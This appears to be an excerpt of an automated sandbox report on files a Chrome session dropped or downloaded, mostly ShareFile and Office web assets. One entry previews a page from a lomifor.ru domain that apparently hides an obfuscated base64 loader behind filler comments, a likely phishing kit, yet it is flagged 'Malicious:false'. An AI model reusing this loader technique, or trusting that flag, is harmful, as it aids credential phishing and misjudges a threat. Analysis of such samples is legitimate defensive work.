                                                                    Preview://@pilet v:2(webpackChunkpr_sharefiledevviewenginepilet,{}).System.register(["@sharefiledev/antd-config","antd","react","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={},s={};return Object.defineProperty(o,"__esModule",{value:!0}),{setters:[function(e){n.sizes=e.sizes},function(e){r.Alert=e.Alert,r.Badge=e.Badge,r.Button=e.Button,r.Card=e.Card,r.Checkbox=e.Checkbox,r.Col=e.Col,r.ConfigProvider=e.ConfigProvider,r.DatePicker=e.DatePicker,r.Divider=e.Divider,r.Dropdown=e.Dropdown,r.Empty=e.Empty,r.Flex=e.Flex,r.Form=e.Form,r.Grid=e.Grid,r.Input=e.Input,r.InputNumber=e.InputNumber,r.Layout=e.Layout,r.List=e.List,r.Menu=e.Menu,r.Modal=e.Modal,r.Popconfirm=e.Popconfirm,r.Radio=e.Radio,r.Result=e.Result,r.Row=e.Row,r.Select=e.Select,r.Skeleton=e.Skeleton,r.Slider=e.Slider,r.Space=e.Space,r.Spin=e.Spin,r.Switch=e.Switch,r.Tabs=e.Tabs,r.Tag=e.Tag,r.Tooltip=e.Tooltip,r.Typography=e.Typography,r.theme=e.theme},function(e){Object.keys(e).forEach((function(t){o[
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:GIF image data, version 89a, 24 x 24
                                                                    Category:dropped
                                                                    Size (bytes):695
                                                                    Entropy (8bit):5.696679956038459
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:648AD2F7EEA95A9B5491DCD2203B2F54
                                                                    SHA1:5FFA99938410AEBAB10B32308F242437B9432B53
                                                                    SHA-256:A3596C17DAD9A003D0BFBE0B7BA6765F51391B5C3943660316F01C8E77B323DB
                                                                    SHA-512:F7984FFEAEC122EFCBE36218979BB4C35E27007CC091BA5A8829BA5088999A3F9F7A7D5E11D90A05904D58644EC0B4E5EE1D57C68DD5270B7F456A762D8D699A
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:GIF89a.............!..NETSCAPE2.0.....!.......,.................0.+......H.....V..!.......,............`..Q.!.......,............`..Q.!.......,............`..Q.!.......,............`..Q.!.......,............`..Q.!.......,............`..Q.!.......,..............z...cr...!.......,.................dp.,.....H.....;..!.......,..........2......dp.,...QP.Td......F.[...v..?y...."......!.......,..........0......dp.,...QP.Td..........gO:.......Q..!.......,..........*......dp.,...QP.Td..........g.|.}.)..!.......,..........&......dp.,...QP.Td............>..!.......,..........#......dp.,...QP.Td........L.6V..!.......,.................dp.,.....H.....;..;
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Unicode text, UTF-8 text, with very long lines (63569)
                                                                    Category:dropped
                                                                    Size (bytes):1316687
                                                                    Entropy (8bit):5.858055435419551
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:8FB128AC348C013C1A5D2496EE07B495
                                                                    SHA1:668B5A4CFC66C1238A2C625B11F148FB92952D7E
                                                                    SHA-256:ADD277C9D05EB8C35C72FE86AF69B0B12BF4E4FDA4D99B981D6B5DE303DEBFD6
                                                                    SHA-512:F2DAE64CD60116C5DDE19E69B2E4B62FB367AD1686BECDFCDA25E228EA947309CB92BAE35405E1DF2C6FA9F48284DB653CECAE1693A89BEF7BA992209683E7B3
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview://@pilet v:2(webpackChunkpr_sharefiledevdcpilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={},s={},l={},c={};return Object.defineProperty(o,"__esModule",{value:!0}),Object.defineProperty(i,"__esModule",{value:!0}),Object.defineProperty(a,"__esModule",{value:!0}),Object.defineProperty(c,"__esModule",{value:!0}),{setters:[function(e){n.AccountsEntity=e.AccountsEntity,n.ContactListType=e.ContactListType,n.ItemsEntity=e.ItemsEntity,n.Uploader=e.Uploader,n.UserRole=e.UserRole,n.UsersEntity=e.UsersEntity,n.ZoneService=e.ZoneService,n.createFile=e.createFile},function(e){r.colorPalette=e.colorPalette,r.sizes=e.sizes},function(e){Object.keys(e).forEach((function(t){o[t]=e[t]}))},function(e){Object.keys(e).forEach((function(t){i[t]=e[t]}))},function(e){Object.keys(e).forEach((function(t){a[t]=e[t]}))},function(e){s.useHistory=e.useHistory,s.useParams=e.useParams
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (13131), with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):13131
                                                                    Entropy (8bit):5.885139431208213
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:3D7BED2967E9DC8ADC9628F0F69D5098
                                                                    SHA1:65B588A9D9397C224344976D18C38EC11F095AC6
                                                                    SHA-256:5AFF1CB4930DDC771363B40BBB94D0926FD0D5ED45A3E1324A890E7F35F242B5
                                                                    SHA-512:C2B5C091D632BF747DFC94F0DBF44BD5B6C83A4712C4192E08CF752A4857B93B2298805C106C99A554E63338141AF6EE502A5C6DF1A7511851E493C1D8363753
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:var ResourceHashJson={'app_scripts/1033/common-intl.min.js':'oGVXL8kPHx9F8rqUqOtaHj/UaGuS4MpU4nK4tMKCCCU=','app_scripts/1033/common-strings.min.js':'OdObZ3Wtv8qFzVL1C2RqlGPvVwq6ZTua+YKbsehAbTw=','app_scripts/1033/common-ui-strings.min.js':'xIAcWf3QLZV7Csng6vlYzd67rSMw7GTHYfenPy8QMFk=','app_scripts/1033/commonintl.js':'VGyQyemnnWEp7eeTrZ2qQoXEx/MZXmCzbl9yWn5iKjo=','app_scripts/1033/emoji-strings.min.js':'nZQjfL5d+D09G6lsQ82FEf1KmgB9rKUoKegK2apDN1k=','app_scripts/1033/mworda-string.min.js':'FCZRw+tkjMOeEOguWlQezOQS5vDmQo5cfv4nxIK5JpE=','app_scripts/1033/wac-wordviewer-strings.min.js':'7mMEQVnZqd+EBmhBLgDe7F8bk3owAqiUwN2WTGJHz7U=','app_scripts/1033/word-app-intl-lazy.min.js':'NrvCj2FDTOWRJF/nNnZlmx5Dqw3nVPTI04JJudidBls=','app_scripts/1033/word-app-intl.min.js':'KTG7T4IH1Cs85KN+ecY6TpV1UoGYkAMnTa/sWKXrIr4=','app_scripts/compat.js':'peNgYPbqucKyPcJyTzdY7cLTinM2phm9tGPDs6gQd88=','app_scripts/compatparentelementfix.common.js':'LjwkmMSI3HkmLfGXTRE/W+vKH4aMZfV+SKhpD4GoX9U=','app_scripts/compatp
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:HTML document, ASCII text, with very long lines (7465), with CRLF line terminators
                                                                    Category:downloaded
                                                                    Size (bytes):19917
                                                                    Entropy (8bit):5.881061860714286
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:76B4EC7B2A2299EE86055EAF1BC25769
                                                                    SHA1:0B24A396CC0A175BCB4C1B04F9CA7D1772801914
                                                                    SHA-256:6E0364E74C56BB6EBE25BF041421F1CFCFB7CBA53ACBEEA621F593A9D1A9A45D
                                                                    SHA-512:35D2D0346FD39546667FFC9C19DADECC389895121FBA5E7ED619FC3AAD174DD1705DDEC08B2B1A79A5DE0F83243B9C96EFB74D75ADD64BC9F267BDA298B702F0
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://s7ol.lomifor.ru/oONm9/
                                                                    Preview: The customer is always right. -->.. Every problem is an opportunity in disguise. -->..<script>....if(atob("aHR0cHM6Ly9wT2ZPLmxvbWlmb3IucnUvb09ObTkv") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6IC
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):19
                                                                    Entropy (8bit):3.6818808028034042
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:595E88012A6521AAE3E12CBEBE76EB9E
                                                                    SHA1:DA3968197E7BF67AA45A77515B52BA2710C5FC34
                                                                    SHA-256:B16E15764B8BC06C5C3F9F19BC8B99FA48E7894AA5A6CCDAD65DA49BBF564793
                                                                    SHA-512:FD13C580D15CC5E8B87D97EAD633209930E00E85C113C776088E246B47F140EFE99BDF6AB02070677445DB65410F7E62EC23C71182F9F78E9D0E1B9F7FDA0DC3
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:404 page not found.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                    Category:downloaded
                                                                    Size (bytes):1098230
                                                                    Entropy (8bit):5.134373207849556
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:75E0B9F03AD89C168935A9CFBB5546CC
                                                                    SHA1:A4300BBAEF81D3DE30BFC26F507C66C6C2A461AB
                                                                    SHA-256:E5616B847AA276E5061AE7FA05D3EB35F6BEB6EB4C1B4CFEF1C27C0357B12A97
                                                                    SHA-512:9742789815402C74991F5166EAF44DF32E2261776E1604BFB2633B3BAD87EF5AD529913458261CE24ED34E802585E2A3254BE53E57FC313515FF181CDF0BEA02
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://0093b71e39a6.11de9b12.us-east-1.token.awswaf.com/0093b71e39a6/478ed03bbf12/challenge.js
                                                                    Preview:var a0_0x53a8=['bind','SafeBag','safeBags','map','element','touchstart','wheel','warn','canvas','10405jtEuNh','contentInfo','1001','fullMessageLength','Amadeus','createKeyPairGenerationState','arr','certificatePolicies','Cannot\x20read\x20password-based-encryption\x20algorithm\x20parameters.\x20ASN.1\x20object\x20is\x20not\x20a\x20supported\x20EncryptedPrivateKeyInfo.','authorityInfoAccess','Proxy\x203','writeOffset','ENCRYPTED','client\x20finished','getRawHostname','EncryptedData','extractWhich','Comic\x20Sans\x20MS','4oSNJWx','2.5.29.31','pBits','1.2.840.113549.1.7.1','decryptPrivateKeyInfo','getBerValueLength','BrowalliaUPC','2.5.29.1','104hFXINP','Algerian','ax-plugin','as-plugin','pathLenConstraint','SHA-384','label','NO_LEVEL_CHECK','FWCIMCompoundCollector','ComponentID','_hashBlock','mmmmmmmmmmlli','Latha','Lucida\x20Sans\x20Typewriter','Unsupported\x20certificate\x20type,\x20only\x20X.509\x20supported.','mac_key_length','userinfoWithAt','[object\x20Array]','CanvasCollector','la
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (5962)
                                                                    Category:downloaded
                                                                    Size (bytes):6092
                                                                    Entropy (8bit):5.032264743816216
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:DE83A7B3BC0A43A5F4E6BF8E71F5413C
                                                                    SHA1:BC3274E5C413EDFA65FB6333E63D7FBEFE1A12A8
                                                                    SHA-256:A5E36060F6EAB9C2B23DC2724F3758EDC2D38A7336A619BDB463C3B3A81077CF
                                                                    SHA-512:23EE201ED9392B9A846992DC3E9E071F219E75641DC907946CB7A5DEDF01F7AD6CCF9A5CA5ABD7B33C5CC77B408BDCEB2C74D3BBBD4F1B70B41183A280C38155
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://res-1.cdn.office.net/officeonline/hashed/a5e36060f6eab9c2/compatparentelementfix.js
                                                                    Preview://! Script# Mozilla Compat Layer.//! Copyright (c) 2006, Nikhil Kothari. All Rights Reserved..//! http://projects.nikhilk.net.//!.var selectNodes=function(e,t,n){n=n||e;for(var o=(new XPathEvaluator).evaluate(t,n,e.createNSResolver(e.documentElement),XPathResult.ORDERED_NODE_SNAPSHOT_TYPE,null),r=new Array(o.snapshotLength),i=0;i<o.snapshotLength;i++)r[i]=o.snapshotItem(i);return r},selectSingleNode=function(e,t,n){var o=selectNodes(e,t+="[1]",n);if(0!=o.length)for(var r=0;r<o.length;r++)if(o[r])return o[r];return null};function __loadCompat(e){e.Debug=function(){},e.Debug._fail=function(e){throw new Error(e)},e.Debug.writeln=function(e){window.console&&window.console.debug(e)},e.__getNonTextNode=function(e){try{for(;e&&1!=e.nodeType;)e=e.parentNode}catch(t){e=null}return e}}function _loadSafariCompat(e){Node.prototype.__defineGetter__("text",(function(){return this.textContent})),Node.prototype.__defineSetter__("text",(function(e){this.textContent=e})),Node.prototype.selectNodes=funct
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):95484
                                                                    Entropy (8bit):5.359590021868469
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:A5AF5F0B1076A2211784FBB347360A11
                                                                    SHA1:7B0581DF57D2DA6FA5AF73AB99CF660982B3C49C
                                                                    SHA-256:73077EB530F0B30D6C4758D279F5ADAE1F26EECD7794A10C29FD7D19649C953D
                                                                    SHA-512:5BAF874872D30B8334B330AF10ECF522F8AEFEFAC939ADB168BAD50FFA8D4122C36FAE3FE1D0EDB49FF07B91B30AAD659E85A337E7767E82AFA0F35ED6A16905
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:var otelWorker;!function(){"use strict";var n=function(e,t){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(n,e){n.__proto__=e}||function(n,e){for(var t in e)Object.prototype.hasOwnProperty.call(e,t)&&(n[t]=e[t])},n(e,t)};function e(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Class extends value "+String(t)+" is not a constructor or null");function r(){this.constructor=e}n(e,t),e.prototype=null===t?Object.create(t):(r.prototype=t.prototype,new r)}var t=function(){return t=Object.assign||function(n){for(var e,t=1,r=arguments.length;t<r;t++)for(var i in e=arguments[t])Object.prototype.hasOwnProperty.call(e,i)&&(n[i]=e[i]);return n},t.apply(this,arguments)};Object.create,Object.create;var r,i=(r=[],{fireEvent:function(n){r.forEach((function(e){return e(n)}))},addListener:function(n){n&&r.push(n)}});function a(n,e,t){i.fireEvent({level:n,category:e,message:t})}function o(n,e,t){a(0,n,(function(){var n=t instanceof Error?t.message:"";return"".concat(
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (65474)
                                                                    Category:dropped
                                                                    Size (bytes):574913
                                                                    Entropy (8bit):5.530948572548355
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:4AC4022A47B571D73CC427C2FCEF38E2
                                                                    SHA1:44F72026BF48B8B4C65F0A127CA5156DC5EDEAF9
                                                                    SHA-256:8DD23B01F0B8FE64D00566771D60C5B87A6924D84BBF87735D874A4D3476CC70
                                                                    SHA-512:BF6FF67ACD58E508A6BE3E3CBDF4CD8BA39EFFA2B69FFF88A12BF549C7101D82AB55498B9F0A1B59D1BFCC07E7EF213D4D5FA84F71EBBCE5B027675FDF0F3C43
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview://@pilet v:2(webpackChunkpr_sharefiledevintegrationspilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom"],(function(e,t){var n={},r={},o={},i={},a={};return Object.defineProperty(i,"__esModule",{value:!0}),{setters:[function(e){n.UsersEntity=e.UsersEntity,n.WorkflowStatus=e.WorkflowStatus},function(e){r.sizes=e.sizes},function(e){o.Alert=e.Alert,o.AutoComplete=e.AutoComplete,o.Avatar=e.Avatar,o.Badge=e.Badge,o.Button=e.Button,o.Col=e.Col,o.Collapse=e.Collapse,o.ConfigProvider=e.ConfigProvider,o.Divider=e.Divider,o.Drawer=e.Drawer,o.Flex=e.Flex,o.Form=e.Form,o.Input=e.Input,o.Layout=e.Layout,o.Menu=e.Menu,o.Modal=e.Modal,o.Row=e.Row,o.Select=e.Select,o.Space=e.Space,o.Spin=e.Spin,o.Table=e.Table,o.Tabs=e.Tabs,o.Tag=e.Tag,o.Typography=e.Typography,o.notification=e.notification,o.theme=e.theme},function(e){Object.keys(e).forEach((function(t){i[t]=e[t]}))},function(e){a["default"]=e["default"],a.findDOMNode=e.findDOMNode,a.flushSync=e.flushSyn
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (65473)
                                                                    Category:downloaded
                                                                    Size (bytes):134014
                                                                    Entropy (8bit):5.346517567334238
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:C899B5933541A7F2F63AC2DED0ABD76A
                                                                    SHA1:CBAA693D97EF78B2F913593E72FF2D0922CF20F2
                                                                    SHA-256:249639DD2EA79C14A9CEBACCFB25F9CA6D2CD3565FAB24B38C61EE950E699D5C
                                                                    SHA-512:DBFD1A28913894BD7FA5F19BCB905C036A4EE6936B022D8A8B638989179C9D9E47B7F13AC1B7C8CDBBBB0F75612E778E8EC440EC38BB55ADC847B51D919E51FD
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-storage-plugin-pilet/1.57.0/package/dist/index.js
                                                                    Preview://@pilet v:2(webpackChunkpr_sharefiledevstoragepluginpilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={},s={},u={};return Object.defineProperty(i,"__esModule",{value:!0}),Object.defineProperty(u,"__esModule",{value:!0}),{setters:[function(e){n.AccountsEntity=e.AccountsEntity,n.Api=e.Api,n.CapabilitiesEntity=e.CapabilitiesEntity,n.CapabilityName=e.CapabilityName,n.ContactListType=e.ContactListType,n.ContactsEntity=e.ContactsEntity,n.CustomWorkflowBundleType=e.CustomWorkflowBundleType,n.DocumentApprovalWorkflowAction=e.DocumentApprovalWorkflowAction,n.EncryptedEmailsEntity=e.EncryptedEmailsEntity,n.ExceptionReason=e.ExceptionReason,n.FileAction=e.FileAction,n.FileLockEntity=e.FileLockEntity,n.FileVirusStatus=e.FileVirusStatus,n.IntegrationProvider=e.IntegrationProvider,n.IntegrationsEntity=e.IntegrationsEntity,n.ItemOperations=e.ItemOperations,n.ItemOrderingMode=e.ItemO
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text
                                                                    Category:downloaded
                                                                    Size (bytes):13593
                                                                    Entropy (8bit):4.97280201927415
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:79E997CA126B2522CDB04FE90DF21752
                                                                    SHA1:9240FE86112391FE95C34F1E49E26C7FBC2B4722
                                                                    SHA-256:4B3A8A6F91F2F2B51FB6AB816435BD3E3B0C6622D005BA080333F49444083C85
                                                                    SHA-512:F97040E83A072F3385197118C0628C0F24693EF3C2AA98FE1F85DA80AF87A0D36825DD20301FC152E3B67011C1D83A2F08EC96C2785CC8BF54EC0AD0ABB0B2EE
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://citrix-sharefile-content.customer.pendo.io/guide.-323232.1622565221517.css
                                                                    Preview:/* ------------------------------. * -- Main Global Styling -------. * ------------------------------ */...\_pendo-guide\_ {. /* -- Overarching settings for all guides -- */.}...\_pendo-guide-container\_ {. -moz-box-shadow: 1px 1px 1px 0 rgba(0,0,0,0.2);. -webkit-box-shadow: 1px 1px 1px 0 rgba(0,0,0,0.2);..box-shadow: 1px 1px 1px 0 rgba(0,0,0,0.2);. /*padding: 40px 20px;*/. font-family: "citrixsans-regular","CitrixSans",CitrixSansRegular, Arial, sans-serif;.}...\_pendo-guide-container\_ .\_pendo-guide-content\_ {. /* -- Content area -- use for font attributes, padding, etc. */.}...\_pendo-guide-container\_ .\_pendo-guide-content\_ .pendo-header {. font-size: 24px;. .line-height: 31px;. color: #485164;. text-align: center;. .font-family: "citrixsans-semibold","citrixsans-regular","CitrixSans",CitrixSansRegular, Arial, sans-serif;. font-weight:600;. .margin-bottom: 16px;. .padding: 0;.}...\_pendo-guide-container\_ .\_pendo-guide-content\_ .pendo-subheader {. font-s
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                    Category:downloaded
                                                                    Size (bytes):48316
                                                                    Entropy (8bit):5.6346993394709
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:2CA03AD87885AB983541092B87ADB299
                                                                    SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                    SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                    SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                    Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 37752, version 1.0
                                                                    Category:downloaded
                                                                    Size (bytes):37752
                                                                    Entropy (8bit):7.994855654944988
                                                                    Encrypted:true
                                                                    SSDEEP:
                                                                    MD5:35D189800D56A9D8BF3D51299A974C1D
                                                                    SHA1:C07153F2F8E97706062A5D5BAD8134F5054D81FE
                                                                    SHA-256:D414E15B5454A3564168592963F45BC312C13040026AD87450B597EE5DCD11FA
                                                                    SHA-512:B110B5A40087A6D04348A043E33FA5C3465EA53C00C683A35523B532A1BF4E30845C4CBDB35B4A302EF8A00E1BD374485557572162BE566B3D431C2BDAB27313
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-dynamic-forms-pilet/1.51.0/package/dist/402b74053d26323596b3.woff2
                                                                    Preview:wOF2.......x....... .................................r..\.`..D.`..........._.6.$..T..,.. ..~..;..=[.lq..c./.jk..6.z...7"9v..U.....,a..w.i..-....OO*2fR!m7......?d.;B.!'/.....4.c$.Y1gR .Ur..."Qs../..FwO..2..=JZ{u..V.f|Q...B%./,..\.l.r...>i.mz.=..w..4F..p..a*M...5.Ncg.........>.P3.......A..Hw..!..h....c...g.)S]......Zs..&|/h.7.....@..X,.@t.K..svk2|.....v..f...R.G.y..2.....e...Bp..A..q...@..Q.r..M.2%.d...AH.tq.I...z.x.@v|..#"...s.s.[.c#.f..c.....`.G.....,.@..G..`7.Q.ZD...P.....U-f...8`.NH.B.]L.....9.yCK[?...8....ti.M...?...6....T.e...{o{.fkF...!Xym.y...U..Q.k....?..=.}.}.q.Y.8....p.....I.Ix.h.....Il.-.2P..fx.{.H.Q.O..f.a....Y.&.=....mD.k....2.2"B~...U!e\.5....t.yA ..O.$....`.9"?#&%.p+..b!....f.8.#...7.....>..l......3..\3.R.M.2S.#...s.t.......@V.a.}3=..a.R.qL*BE.Xx .^.W@..6...O..Y....Z.I.+m..=...g....`.*).\..!.....`Q.).j}4!..L........z..j..`5r../........~j.k..\.....nn..:.W|..E.A.#.d...?M........w.,....+....St..x.....>LL..-or.T.oM.2.. "........
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (65480)
                                                                    Category:downloaded
                                                                    Size (bytes):178957
                                                                    Entropy (8bit):5.329172923363456
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:AE2B23717A37A5CC2EC9499489C092B5
                                                                    SHA1:BDD4A15043782166B49B72087FD9FDF7A28548D8
                                                                    SHA-256:755342DD7890EDA8D315EB9F13BAC52E25067EBD8EC01B73318047606B6DC1CF
                                                                    SHA-512:C863F929FED4C17E608ED9D5DDA8EFA6587E33880D711ED227596DCA0C3502A2CBCD171C60760A89D5025A58ACA85E4581FDFDD4C7B04B3E59474EAB430B728D
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-client-pilet/0.10.8/package/dist/index.js
                                                                    Preview://@pilet v:2(webpackChunkpr_sharefiledevclientpilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,n){var t={},r={},i={},o={},a={},s={},u={},c={};return Object.defineProperty(o,"__esModule",{value:!0}),{setters:[function(e){t.AccountsEntity=e.AccountsEntity,t.Api=e.Api,t.AppsEntity=e.AppsEntity,t.CapabilitiesEntity=e.CapabilitiesEntity,t.CapabilityName=e.CapabilityName,t.ContactListType=e.ContactListType,t.ContactsEntity=e.ContactsEntity,t.CustomWorkflowBundleType=e.CustomWorkflowBundleType,t.DocumentApprovalWorkflowAction=e.DocumentApprovalWorkflowAction,t.EncryptedEmailsEntity=e.EncryptedEmailsEntity,t.ExceptionReason=e.ExceptionReason,t.FavoritesEntity=e.FavoritesEntity,t.FileAction=e.FileAction,t.FileLockEntity=e.FileLockEntity,t.FileVirusStatus=e.FileVirusStatus,t.IntegrationProvider=e.IntegrationProvider,t.IntegrationsEntity=e.IntegrationsEntity,t.ItemOperations=e.ItemOperations,
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:JSON data
                                                                    Category:downloaded
                                                                    Size (bytes):17492
                                                                    Entropy (8bit):4.927836251844071
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:EA5D91FA7D62BBB4A51DB0337F54A99A
                                                                    SHA1:7735372A828C995CA7388EE6729F3A96E365A72A
                                                                    SHA-256:FA886024E1CF23B591C07A52E546CEE4015F968B3C69826F0F39A51C223B76D1
                                                                    SHA-512:D3B45B065D76183542D06611B2077A84DCEDBC7688F2A6FC1876FF13F8324462D7132B08025A6777CB4F206F9437680CFFF814AE0ED50EFAE15DF1027A09BB07
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://res-1.cdn.office.net/officeonline/versioned/suiteux-shell/4.0.73/strings/en/shellstrings.json
                                                                    Preview:{. "Microsoft": "Microsoft",. "FlexpaneCloseButton": "Close pane",. "Me_Header": "My account",. "MePhotoAriaLabel": "{0} {1} Current account's user photo",. "ChangePhotoAriaLabel": "{0} {1} Change the photo that appears in IM. This may open a new window.",. "MePhotoTitle": "Current account's user photo",. "ChangePhotoTitle": "Change the photo that appears in IM. This may open a new window.",. "AppLauncherAriaLabel": "App launcher opened",. "AppLauncherCloseAriaLabel": "Close the app launcher",. "AppLauncherHomeAriaLabel": "Microsoft 365, will be open in new tab",. "AppsModuleHeading": "Apps",. "Microsoft365": "Microsoft 365",. "AppsModuleAllApps": "All apps",. "AppsModuleAllAppsTooltip": "Open all apps",. "AllViewGroupShowMore": "Show More",. "AllViewGroupShowLess": "Show Less",. "AllViewBack": "Back",. "AllViewNewGroupHeading": "New",. "AllViewAdminSelectedGroupHeading": "Admin selected apps",. "AllViewMoreFirstPartyGroupHeading": "More from Microsoft",. "AllViewT
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:JSON data
                                                                    Category:downloaded
                                                                    Size (bytes):347
                                                                    Entropy (8bit):5.41262152427615
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:0A497D514869B5FCF25596C93C9E6717
                                                                    SHA1:5D4E2A6FB446E7B757221A76924FE06A5BC2681F
